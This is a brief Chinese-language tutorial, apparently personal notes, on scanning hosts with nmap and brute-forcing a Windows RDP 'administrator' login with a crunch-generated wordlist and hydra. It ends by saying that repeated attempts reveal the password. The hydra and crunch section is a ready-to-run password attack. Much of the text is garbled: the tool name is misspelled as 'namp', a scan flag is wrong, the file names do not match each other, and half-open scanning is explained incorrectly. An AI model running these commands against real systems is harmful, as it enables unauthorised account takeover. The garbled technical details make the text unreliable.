namp
-----一款强大的网络扫描,安全检测工具。
常用的扫描类型:(全开,半开)。
全开:指的是三次握手扫描,
半开:指的是两次握手扫描,少了一次,但结果相同。
1. -sS ,tcp扫描(半开),
2. -sT ,tcp扫描(全开),
3. -sU, udp扫描
4. -sp ICMP扫描。
扫描特定的主机
namp (扫描类型) (选项) 扫描目标
列如: namp -sS -p 3389 192.168.1.1
namp -sS -p 80 192.168.1.2
扫描特定网段主机
nmap -sS 192.168.1.1-10
扫描特定主机的tcp端口开放情况
namp -sS 192.168.10.10
扫描特定主机的udp端口开放 情况
namp -sU 192.168.10.10
图片
hydra是kalix系统自带的破解工具 ,破解之前要用一个密码字典生成工具 crunch;
密码分为四个部分
大写字母
小写字母
表点符号
子符
密码字典格式类型:
crunch 6 6 abc123456 -d 1 -o pa123.txt
---- ---- ----------------- ---------- ---------
小 大 生成字典的字符 不连续 输出 生成到pa23.tx文件
最后进行攻击;
hydra -l administrator -P pass123.txt 192.168.0.132 rdp
小l 指定用户名 大P 指定密码字典 目标主机 目标程序(端口号)。
备注:一次可能不会成功,多试几次
成功后可以看见 password:123456
